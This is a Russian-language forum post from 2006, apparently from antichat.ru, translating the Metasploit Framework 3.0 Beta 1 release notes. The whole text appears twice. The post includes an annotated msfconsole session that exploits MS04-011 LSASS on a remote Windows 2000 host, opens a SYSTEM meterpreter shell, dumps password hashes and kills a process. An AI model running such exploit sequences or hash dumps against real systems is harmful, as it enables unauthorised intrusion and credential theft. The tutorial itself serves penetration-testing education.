-=lebed=-
28.11.2006, 14:08
Меtasploit Framework 3.0
Предисловие:
Прежде чем приступать к чтению статьи, для более глубокого понимания рекомендую ознакомиться с моими статьями по данному пакету
http://www.forum.antichat.ru/thread21599.html
http://www.forum.antichat.ru/thread21686.html
Статья ИМХО не расчитана на новичков, а предназначена для тех кто достаточно хорошо владеет навыками пользования пакетом и обладает определённым багажом знаний по вопросом эксплуатации уязвимостей...
1. Перевод с официального сайта новости, касающейся выхода пакета Metasploit Framework 3.0 Beta 1 (hdm) от 02.08.2006. оригинал новости (http://metasploit.com/)
Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.
Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)
Этот выпуск может быть скачан с официального web-сайта Metasploit отсюда (http://metasploit.com/projects/Framework/msf3/#download)
Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (http://ru.wikipedia.org/wiki/Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org и собрать его из исходника.
Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)
Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).
Быстрая демонстрация использования msfconsole с meterpreter:
____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *
= [msf v3.0-beta-1
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
+ -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
= [4 aux
msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
Started bind handler.. .................................... стартует связанный обработчик
Getting OS information... .................................... Получаем информацию об операционной системе
Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
Upload completed. .................................................. . Загрузка завершена.
Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============
Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps .................................................. ....... смотрим процессы
Process list
============
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)
Обратная связь (http://metasploit.blogspot.com/2006/08/metasploit-framework-30-beta-1.html#comments)
Старые статьи были перемещены в архив.
(с) metasploit.com, альфа версия перевода -=lebed=- 28.11.2006
P.S. Перевод сыроват, буду править... буду рад видеть здесь поправики, подсказки от всех интересующихся и пользующихся пакетом v.3.0 проекта Metasploit Framework
Предисловие:
Прежде чем приступать к чтению статьи, для более глубокого понимания рекомендую ознакомиться с моими статьями по данному пакету
http://www.forum.antichat.ru/thread21599.html
http://www.forum.antichat.ru/thread21686.html
Статья ИМХО не расчитана на новичков, а предназначена для тех кто достаточно хорошо владеет навыками пользования пакетом и обладает определённым багажом знаний по вопросом эксплуатации уязвимостей...
1. Перевод с официального сайта новости, касающейся выхода пакета Metasploit Framework 3.0 Beta 1 (hdm) от 02.08.2006. оригинал новости (http://metasploit.com/)
Мы счастливы объявить, что первый beta 3.0 релиз теперь готов к загрузке. Этот выпуск содержит многочисленные исправления (багфиксы) и усовершенствования к предыдущему выпуску альфа релиз. 3.0 1 Beta полностью совместим с Линуксом, BSD, Mac OS X, и Windows (используется наш доработанный Cygwin инсталлятор). Если Вы хотели бы обсудить выпуск beta с другими пользователями, пожалуйста подпишитесь на список рассылки beta framework, послав пустое письмо по e-mail с темой framework-beta.
Некоторые фишки по сравнению с версией 2.6:
- Все модули организованы в каталоге heirarchy
- Общие{Обычные} Meterpreter модули были объединены в 'stdapi'
- Новые особенности Meterpreter значительно помогают с испытанием проникновения
- Новый тип "пассивных" эксплоитов (браузер, сниффер, нападения на ids - ситему обнаружения вторжений )
- Модули отказа в обслуживании (ms05-035 и пропаченный RRAS)
- Поддержка для множественных шеллов (оболочек) при эксплуатировании с пассивными модулями
- Поддержка для последних багов браузеров :-)
Этот выпуск может быть скачан с официального web-сайта Metasploit отсюда (http://metasploit.com/projects/Framework/msf3/#download)
Пользователи Unix, нуждаются в установке openssl и zlib модулей Руби (Ruby) (http://ru.wikipedia.org/wiki/Ruby) (интерпретируемый язык программирования высокого уровня) для загрузки среды разработки
Если Вы используете Ubuntu, выполните следующие команды:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
Пользователь других дистрибутивов или разновидностей Unix могут загрузить последнюю версию Руби от www.ruby-lang.org и собрать его из исходника.
Mac OS X пользователи должены установить GNU Readline до пересборки Руби. Хотя можно использовать Среду разработки без readline, но на завершение работы в msfconsole может потребоваться некоторое время. (прим. не уверен что правильно перевёл)
Пользователи Windows будут должны выйти из любых приложений на базе Cygwin перед запуском инсталятора и не использовать Среду разработки в это время. Мы действительно пробовали работать с родным Руби-интерпретатором для Windows, но последовали многочисленные проблемы вода-вывода/readline/stdin, и мы попытаемся снова, основной код сделать более стабильным (устойчивым).
Быстрая демонстрация использования msfconsole с meterpreter:
____________
<metasploit>
------------
\, __,
\ (oo) ____
(__)) || - || *
= [msf v3.0-beta-1
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads....................[86 эксплоитов - 90 начинок (полезных грузов)
+ -- --=[ 16 encoders - 4 nops ........................[16 кодеров - 4 только для указанных целей (неуверен в переводе)
= [4 aux
msf > use exploit/windows/smb/ms04_011_lsass ............................ будем использовать ms04_011_lsass эксплоит
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 ................... устанавливаем IP-адрес удалённого хоста
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp .. устанавливаем начинку bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit.................................... запускаем эксплоит
Started bind handler.. .................................... стартует связанный обработчик
Getting OS information... .................................... Получаем информацию об операционной системе
Trying to exploit Windows 2000 LAN Manager .......................... Пробуем эксплуатировать уязвимость диспечера локальной сети Windows 2000
Transmitting intermediate stager for over-sized stage...(89 bytes) .. Передача промежуточного звена stager для стадии с завышенными размерами... (89 байтов)
Sending stage (2834 bytes) .......................................... Посылка стадии (2834 байта)
Sleeping before handling stage... ................................... Бездействие перед обработкой стадии
Uploading DLL (73739 bytes)... ...................................... Загрузка DLL (73739 байтов)...
Upload completed. .................................................. . Загрузка завершена.
Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444) .................................................. ... открыт Meterpreter сеанс 1 (192.168.0.145:41829->192.168.0.106:4444)
The DCERPC service did not reply to our request ..................... сервис(служба) DCERPC не отвечал на наш запрос
Loading extension stdapi...success. ..................................... Загрузка расширения stdapi (стандартн. api) ... успех.
meterpreter > getuid .................................................. .. получить uid (универс. идентификатор)
Server username: SYSTEM ................................................. Имя пользователя сервера SYSTEM!
meterpreter > use priv .................................................. используем priv
Loading extension priv...success. ....................................... Загрузка расширения priv ... успех.
meterpreter > hashdump .................................................. Дампим хэш
Administrator:500:aad3b435b51404eeaad3b435b51404ee :[snip]::: ............ Administrator:500:aad3b435b51404eeaad3b435b51404ee : [надрез]::
meterpreter > cd c:meterpreter > ls ..................................... переходим в корень диска с:, листинг содержимого диска c:
Listing: c: .................................................. ........... Листинг С:
============
Mode Size Type Last modified Name ....................................... Размер/Режим/Тип/Дата послед. модификации/Имя
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps .................................................. ....... смотрим процессы
Process list
============
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ] .................................................. ................ надрез
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676 .................................................. . убиваем процесс с PID 2676
Killing: 2676 .................................................. ........... убивается ;-)
Обратная связь (http://metasploit.blogspot.com/2006/08/metasploit-framework-30-beta-1.html#comments)
Старые статьи были перемещены в архив.
(с) metasploit.com, альфа версия перевода -=lebed=- 28.11.2006
P.S. Перевод сыроват, буду править... буду рад видеть здесь поправики, подсказки от всех интересующихся и пользующихся пакетом v.3.0 проекта Metasploit Framework